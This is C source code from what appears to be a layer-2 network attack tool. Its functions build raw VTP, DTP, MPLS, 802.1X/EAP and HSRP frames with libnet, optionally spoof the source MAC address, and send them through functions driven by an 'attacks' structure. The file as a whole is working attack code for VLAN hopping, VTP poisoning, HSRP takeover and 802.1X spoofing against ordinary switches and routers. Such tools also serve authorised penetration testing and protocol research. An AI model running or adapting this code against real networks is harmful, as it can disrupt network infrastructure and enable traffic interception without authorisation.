int8_t
vtp_send(struct attacks *attacks)
{
libnet_ptag_t t;
libnet_t *lhandler;
u_int32_t vtp_len=0, sent;
struct vtp_data *vtp_data;
struct vtp_summary *vtp_summ;
struct vtp_subset *vtp_subset;
struct vtp_request *vtp_request;
struct vtp_join *vtp_join;
u_int8_t *vtp_packet, *aux;
u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x03 };
dlist_t *p;
struct interface_data *iface_data;
struct interface_data *iface_data2;
vtp_data = attacks->data;
switch(vtp_data->code)
{
case VTP_SUMM_ADVERT:
vtp_len = sizeof(cisco_data)+sizeof(struct vtp_summary);
break;
case VTP_SUBSET_ADVERT:
vtp_len = sizeof(cisco_data)+sizeof(struct vtp_subset)+vtp_data->vlans_len;
break;
case VTP_REQUEST:
vtp_len = sizeof(cisco_data)+38;
break;
case VTP_JOIN:
vtp_len = sizeof(cisco_data)+40+126;
break;
default:
vtp_len = sizeof(cisco_data)+30;
break;
}
vtp_packet = calloc(1,vtp_len);
if (vtp_packet == NULL)
{
thread_error("vtp_send calloc error",errno);
return -1;
}
aux = vtp_packet;
memcpy(vtp_packet,cisco_data,sizeof(cisco_data));
aux+=sizeof(cisco_data);
switch(vtp_data->code)
{
case VTP_SUMM_ADVERT:
vtp_summ = (struct vtp_summary *)aux;
vtp_summ->version = vtp_data->version;
vtp_summ->code = vtp_data->code;
vtp_summ->followers = vtp_data->followers;
if (vtp_data->dom_len > VTP_DOMAIN_SIZE)
{
vtp_summ->dom_len = VTP_DOMAIN_SIZE;
memcpy(vtp_summ->domain,vtp_data->domain,VTP_DOMAIN_SIZE);
}
else
{
vtp_summ->dom_len = vtp_data->dom_len;
memcpy(vtp_summ->domain,vtp_data->domain,vtp_data->dom_len);
}
vtp_summ->revision = htonl(vtp_data->revision);
vtp_summ->updater = htonl(vtp_data->updater);
memcpy(vtp_summ->timestamp,vtp_data->timestamp,VTP_TIMESTAMP_SIZE);
memcpy(vtp_summ->md5,vtp_data->md5,16);
break;
case VTP_SUBSET_ADVERT:
vtp_subset = (struct vtp_subset *)aux;
vtp_subset->version = vtp_data->version;
vtp_subset->code = vtp_data->code;
vtp_subset->seq = vtp_data->seq;
if (vtp_data->dom_len > VTP_DOMAIN_SIZE)
{
vtp_subset->dom_len = VTP_DOMAIN_SIZE;
memcpy(vtp_subset->domain,vtp_data->domain,VTP_DOMAIN_SIZE);
}
else
{
vtp_subset->dom_len = vtp_data->dom_len;
memcpy(vtp_subset->domain,vtp_data->domain,vtp_data->dom_len);
}
vtp_subset->revision = htonl(vtp_data->revision);
if (vtp_data->vlans_len)
memcpy((vtp_subset+1),vtp_data->vlan_info,vtp_data->vlans_len);
break;
case VTP_REQUEST:
vtp_request = (struct vtp_request *)aux;
vtp_request->version = vtp_data->version;
vtp_request->code = vtp_data->code;
vtp_request->reserved = 0;
if (vtp_data->dom_len > VTP_DOMAIN_SIZE)
{
vtp_request->dom_len = VTP_DOMAIN_SIZE;
memcpy(vtp_request->domain,vtp_data->domain,VTP_DOMAIN_SIZE);
}
else
{
vtp_request->dom_len = vtp_data->dom_len;
memcpy(vtp_request->domain,vtp_data->domain,vtp_data->dom_len);
}
vtp_request->start_val = htons(vtp_data->start_val);
break;
case VTP_JOIN:
vtp_join = (struct vtp_join *)aux;
vtp_join->version = vtp_data->version;
vtp_join->code = vtp_data->code;
vtp_join->maybe_reserved = 0;
if (vtp_data->dom_len > VTP_DOMAIN_SIZE)
{
vtp_join->dom_len = VTP_DOMAIN_SIZE;
memcpy(vtp_join->domain,vtp_data->domain,VTP_DOMAIN_SIZE);
}
else
{
vtp_join->dom_len = vtp_data->dom_len;
memcpy(vtp_join->domain,vtp_data->domain,vtp_data->dom_len);
}
vtp_join->vlan = htonl(0x000003ef);
vtp_join->unknown[0] = 0x40;
break;
default:
aux[0]=vtp_data->version;
aux[1]=vtp_data->code;
break;
}
for (p = attacks->used_ints->list; p; p = dlist_next(attacks->used_ints->list, p)) {
iface_data = (struct interface_data *) dlist_data(p);
lhandler = iface_data->libnet_handler;
t = libnet_build_802_2(
0xaa, /* DSAP */
0xaa, /* SSAP */
0x03, /* control */
vtp_packet, /* payload */
vtp_len, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
thread_libnet_error("Can't build ethernet header",lhandler);
libnet_clear_packet(lhandler);
free(vtp_packet);
return -1;
}
t = libnet_build_802_3(
vtp_data->mac_dest, /* ethernet destination */
(attacks->mac_spoofing) ? vtp_data->mac_source : iface_data->etheraddr,
/* ethernet source */
LIBNET_802_2_H + vtp_len, /* frame size */
NULL, /* payload */
0, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
thread_libnet_error("Can't build ethernet header",lhandler);
libnet_clear_packet(lhandler);
free(vtp_packet);
return -1;
}
/*
* Write it to the wire.
*/
sent = libnet_write(lhandler);
if (sent == -1) {
thread_libnet_error("libnet_write error", lhandler);
libnet_clear_packet(lhandler);
free(vtp_packet);
return -1;
}
libnet_clear_packet(lhandler);
protocols[PROTO_VTP].packets_out++;
iface_data2 = interfaces_get_struct(iface_data->ifname);
iface_data2->packets_out[PROTO_VTP]++;
}
free(vtp_packet);
return 0;
}
int8_t
dtp_send(struct attacks *attacks)
{
libnet_ptag_t t;
libnet_t *lhandler;
u_int32_t dtp_len, sent;
struct dtp_data *dtp_data;
u_int8_t *dtp_packet, *aux;
u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x04 };
dlist_t *p;
struct interface_data *iface_data;
struct interface_data *iface_data2;
dtp_data = attacks->data;
dtp_len = sizeof(cisco_data)+dtp_data->dom_len+26;
dtp_packet = calloc(1,dtp_len);
if (dtp_packet == NULL)
{
thread_error("dtp_send calloc error",errno);
return -1;
}
aux = dtp_packet;
memcpy(dtp_packet,cisco_data,sizeof(cisco_data));
aux+=sizeof(cisco_data);
*aux = dtp_data->version;
aux++; aux++;
*aux = DTP_TYPE_DOMAIN;
aux++; aux++;
*aux = dtp_data->dom_len+5;
aux++;
memcpy(aux,dtp_data->domain,dtp_data->dom_len);
aux+=dtp_data->dom_len;
aux++; aux++;
*aux = DTP_TYPE_STATUS; aux++; aux++;
*aux = 0x05; aux++;
*aux = dtp_data->status;
aux++; aux++;
*aux = DTP_TYPE_TYPE; aux++; aux++;
*aux = 0x05; aux++;
*aux = dtp_data->type;
aux++; aux++;
*aux = DTP_TYPE_NEIGHBOR; aux++; aux++;
*aux = 0x0a; aux++;
memcpy(aux,dtp_data->neighbor,ETHER_ADDR_LEN);
for (p = attacks->used_ints->list; p; p = dlist_next(attacks->used_ints->list, p)) {
iface_data = (struct interface_data *) dlist_data(p);
lhandler = iface_data->libnet_handler;
t = libnet_build_802_2(
0xaa, /* DSAP */
0xaa, /* SSAP */
0x03, /* control */
dtp_packet, /* payload */
dtp_len, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
thread_libnet_error("Can't build ethernet header",lhandler);
libnet_clear_packet(lhandler);
free(dtp_packet);
return -1;
}
t = libnet_build_802_3(
dtp_data->mac_dest, /* ethernet destination */
(attacks->mac_spoofing) ? dtp_data->mac_source : iface_data->etheraddr,
/* ethernet source */
LIBNET_802_2_H + dtp_len, /* frame size */
NULL, /* payload */
0, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
thread_libnet_error("Can't build ethernet header",lhandler);
libnet_clear_packet(lhandler);
free(dtp_packet);
return -1;
}
/*
* Write it to the wire.
*/
sent = libnet_write(lhandler);
if (sent == -1) {
thread_libnet_error("libnet_write error", lhandler);
libnet_clear_packet(lhandler);
free(dtp_packet);
return -1;
}
libnet_clear_packet(lhandler);
protocols[PROTO_DTP].packets_out++;
iface_data2 = interfaces_get_struct(iface_data->ifname);
iface_data2->packets_out[PROTO_DTP]++;
}
free(dtp_packet);
return 0;
}
void
mpls_send(struct attacks *attacks)
{
sigset_t mask;
struct mpls_data *mpls_data;
libnet_ptag_t t;
libnet_t *lhandler;
int32_t sent;
int32_t payload_size=0, packet_size=0;
u_int8_t *payload=NULL;
dlist_t *p;
struct interface_data *iface_data;
struct interface_data *iface_data2;
pthread_mutex_lock(&attacks->attack_th.finished);
pthread_detach(pthread_self());
mpls_data = attacks->data;
sigfillset(&mask);
if (pthread_sigmask(SIG_BLOCK, &mask, NULL))
{
thread_error("mpls_send pthread_sigmask()",errno);
return;
}
if (mpls_data->ip_payload && mpls_data->ip_payload[0])
{
payload_size = strlen((const char *)mpls_data->ip_payload);
payload = mpls_data->ip_payload;
}
for (p = attacks->used_ints->list; p; p = dlist_next(attacks->used_ints->list, p))
{
iface_data = (struct interface_data *) dlist_data(p);
lhandler = iface_data->libnet_handler;
switch(mpls_data->proto)
{
case IPPROTO_TCP:
packet_size = LIBNET_TCP_H + payload_size;
t = libnet_build_tcp(
mpls_data->src_port, /* source port */
mpls_data->dst_port, /* destination port */
0x666, /* sequence number */
0x00000000, /* acknowledgement num */
TH_SYN, /* control flags */
32767, /* window size */
0, /* checksum */
0, /* urgent pointer */
packet_size, /* TCP packet size */
payload, /* payload */
payload_size, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
break;
case IPPROTO_UDP:
packet_size = LIBNET_UDP_H + payload_size;
t = libnet_build_udp(
mpls_data->src_port, /* source port */
mpls_data->dst_port, /* destination port */
packet_size, /* UDP packet size */
0, /* checksum */
payload, /* payload */
payload_size, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
break;
case IPPROTO_ICMP:
packet_size = LIBNET_ICMPV4_ECHO_H + payload_size;
t = libnet_build_icmpv4_echo(
ICMP_ECHO, /* type */
0, /* code */
0, /* checksum */
0x42, /* id */
0x42, /* sequence number */
payload, /* payload */
payload_size, /* payload size */
lhandler, /* libnet handle */
0);
break;
}
if (t == -1)
{
thread_libnet_error("Can't build tcp/udp/icmp header",lhandler);
libnet_clear_packet(lhandler);
return;
}
t = libnet_build_ipv4(
LIBNET_IPV4_H + packet_size, /* length */
0, /* TOS */
242, /* IP ID */
0, /* IP Frag */
128, /* TTL */
mpls_data->proto, /* protocol */
0, /* checksum */
htonl(mpls_data->src_ip), /* source IP */
htonl(mpls_data->dst_ip), /* destination IP */
NULL, /* payload */
0, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
thread_libnet_error("Can't build IP header",lhandler);
libnet_clear_packet(lhandler);
return;
}
t = libnet_build_mpls(
mpls_data->label1, /* label */
mpls_data->exp1, /* experimental */
LIBNET_MPLS_BOS_ON, /* bottom of stack */
mpls_data->ttl1, /* ttl */
NULL, /* payload */
0, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
thread_libnet_error("Can't build MPLS header",lhandler);
libnet_clear_packet(lhandler);
return;
}
if (mpls_data->double_hdr)
{
t = libnet_build_mpls(
mpls_data->label2, /* label */
mpls_data->exp2, /* experimental */
LIBNET_MPLS_BOS_OFF, /* bottom of stack */
mpls_data->ttl2, /* ttl */
NULL, /* payload */
0, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
thread_libnet_error("Can't build MPLS header",lhandler);
libnet_clear_packet(lhandler);
return;
}
}
t = libnet_build_ethernet(
mpls_data->mac_dest, /* ethernet destination */
mpls_data->mac_source, /* ethernet source */
ETHERTYPE_MPLS, /* protocol type */
NULL, /* payload */
0, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
thread_libnet_error("Can't build Ethernet header",lhandler);
libnet_clear_packet(lhandler);
return;
}
/*
* Write it to the wire.
*/
sent = libnet_write(lhandler);
if (sent == -1)
{
thread_libnet_error("libnet_write error", lhandler);
libnet_clear_packet(lhandler);
return;
}
libnet_clear_packet(lhandler);
protocols[PROTO_MPLS].packets_out++;
iface_data2 = interfaces_get_struct(iface_data->ifname);
iface_data2->packets_out[PROTO_MPLS]++;
}
}
int8_t
dot1x_send(struct attacks *attacks)
{
libnet_ptag_t t;
libnet_t *lhandler;
int32_t sent;
int32_t payload_size=0;
struct dot1x_data *dot1x_data;
struct eap_header *eap_hdr;
u_int8_t *payload=NULL, *cursor;
dlist_t *p;
struct interface_data *iface_data;
struct interface_data *iface_data2;
dot1x_data = attacks->data;
dot1x_data->len = 4;
if (dot1x_data->len >= sizeof(struct eap_header))
{
write_log(0,"Payload = %d + 1 + 4\n",dot1x_data->eap_info_len);
payload = (u_int8_t *)calloc(1,dot1x_data->eap_info_len+1+4);
if (payload == NULL)
{
thread_error("dot1x_send calloc()",errno);
return -1;
}
eap_hdr = (struct eap_header *)payload;
eap_hdr->code = dot1x_data->eap_code;
eap_hdr->id = dot1x_data->eap_id;
cursor = (u_int8_t *)(eap_hdr+1);
*cursor = dot1x_data->eap_type;
if (dot1x_data->eap_info_len)
memcpy((void *)(cursor+1),dot1x_data->eap_info,dot1x_data->eap_info_len);
switch(dot1x_data->eap_code)
{
case DOT1X_EAP_RESPONSE:
if (dot1x_data->eap_type == 0x01) /* Notification */
{
dot1x_data->len = sizeof(struct eap_header) + 1 + dot1x_data->eap_info_len;
eap_hdr->len = htons(sizeof(struct eap_header) + 1 + dot1x_data->eap_info_len);
payload_size = sizeof(struct eap_header) + 1 + dot1x_data->eap_info_len;
}
else
{
dot1x_data->len = sizeof(struct eap_header) + 1;
eap_hdr->len = htons(sizeof(struct eap_header)+1);
payload_size = sizeof(struct eap_header) + 1;
}
break;
case DOT1X_EAP_REQUEST:
dot1x_data->len = sizeof(struct eap_header) + 1;
eap_hdr->len = htons(sizeof(struct eap_header)+1);
payload_size = sizeof(struct eap_header) + 1;
break;
default:
dot1x_data->len = sizeof(struct eap_header);
eap_hdr->len = htons(sizeof(struct eap_header));
payload_size = sizeof(struct eap_header);
break;
}
}
write_log(0,"Antes envio payload=%p psize=%d dot1x_data->len=%d\n",payload,payload_size,dot1x_data->len);
for (p = attacks->used_ints->list; p; p = dlist_next(attacks->used_ints->list, p))
{
iface_data = (struct interface_data *) dlist_data(p);
lhandler = iface_data->libnet_handler;
t = libnet_build_802_1x(
dot1x_data->version,
dot1x_data->type,
dot1x_data->len,
payload,
payload_size,
lhandler,
0);
if (t == -1)
{
thread_libnet_error("Can't build 802.1x header",lhandler);
libnet_clear_packet(lhandler);
if (payload)
free(payload);
return -1;
}
t = libnet_build_ethernet(
dot1x_data->mac_dest, /* ethernet destination */
dot1x_data->mac_source, /* ethernet source */
ETHERTYPE_EAP, /* protocol type */
NULL, /* payload */
0, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
thread_libnet_error("Can't build Ethernet_II header",lhandler);
libnet_clear_packet(lhandler);
if (payload)
free(payload);
return -1;
}
/*
* Write it to the wire.
*/
sent = libnet_write(lhandler);
if (sent == -1) {
thread_libnet_error("libnet_write error", lhandler);
libnet_clear_packet(lhandler);
if (payload)
free(payload);
return -1;
}
libnet_clear_packet(lhandler);
protocols[PROTO_DOT1X].packets_out++;
iface_data2 = interfaces_get_struct(iface_data->ifname);
iface_data2->packets_out[PROTO_DOT1X]++;
}
if (payload)
free(payload);
return 0;
}
int8_t
hsrp_send_packet(struct attacks *attacks)
{
libnet_ptag_t t;
int sent;
u_int16_t len;
struct hsrp_data *hsrp_data;
u_int8_t *hsrp_packet, *aux;
libnet_t *lhandler;
dlist_t *p;
struct interface_data *iface_data;
struct interface_data *iface_data2;
hsrp_data = attacks->data;
hsrp_packet = calloc(1, HSRP_PACKET_SIZE);
aux = hsrp_packet;
*aux = hsrp_data->version; aux++;
*aux = hsrp_data->opcode; aux++;
*aux = hsrp_data->state; aux++;
*aux = hsrp_data->hello_time; aux++;
*aux = hsrp_data->hold_time; aux++;
*aux = hsrp_data->priority; aux++;
*aux = hsrp_data->group; aux++;
*aux = hsrp_data->reserved; aux++;
len = strlen(hsrp_data->authdata);
memcpy((void *)aux, (void *)hsrp_data->authdata, (len < HSRP_AUTHDATA_LENGTH) ? len : HSRP_AUTHDATA_LENGTH);
/* aux += (len < HSRP_AUTHDATA_LENGTH) ? len : HSRP_AUTHDATA_LENGTH;*/
aux += 8;
(*(u_int32_t *)aux) = (u_int32_t) htonl(hsrp_data->virtual_ip);
for (p = attacks->used_ints->list; p; p = dlist_next(attacks->used_ints->list, p)) {
iface_data = (struct interface_data *) dlist_data(p);
lhandler = iface_data->libnet_handler;
t = libnet_build_udp(
hsrp_data->sport, /* source port */
hsrp_data->dport, /* destination port */
LIBNET_UDP_H + HSRP_PACKET_SIZE, /* packet size */
0, /* checksum */
hsrp_packet, /* payload */
HSRP_PACKET_SIZE, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
thread_libnet_error( "Can't build udp datagram",lhandler);
libnet_clear_packet(lhandler);
return -1;
}
t = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_UDP_H + HSRP_PACKET_SIZE,/* length */
0x10, /* TOS */
0, /* IP ID */
0, /* IP Frag */
1, /* TTL */
IPPROTO_UDP, /* protocol */
0, /* checksum */
hsrp_data->sip, /* src ip */
hsrp_data->dip, /* destination ip */
NULL, /* payload */
0, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
thread_libnet_error("Can't build ipv4 packet",lhandler);
libnet_clear_packet(lhandler);
return -1;
}
t = libnet_build_ethernet(
hsrp_data->mac_dest, /* ethernet destination */
(attacks->mac_spoofing) ? hsrp_data->mac_source : iface_data->etheraddr,
/* ethernet source */
ETHERTYPE_IP,
NULL, /* payload */
0, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
thread_libnet_error("Can't build ethernet header",lhandler);
libnet_clear_packet(lhandler);
return -1;
}
/*
* Write it to the wire.
*/
sent = libnet_write(lhandler);
if (sent == -1) {
thread_libnet_error("libnet_write error", lhandler);
libnet_clear_packet(lhandler);
return -1;
}
libnet_clear_packet(lhandler);
protocols[PROTO_HSRP].packets_out++;
iface_data2 = interfaces_get_struct(iface_data->ifname);
iface_data2->packets_out[PROTO_HSRP]++;
}
free(hsrp_packet);
return 0;
}
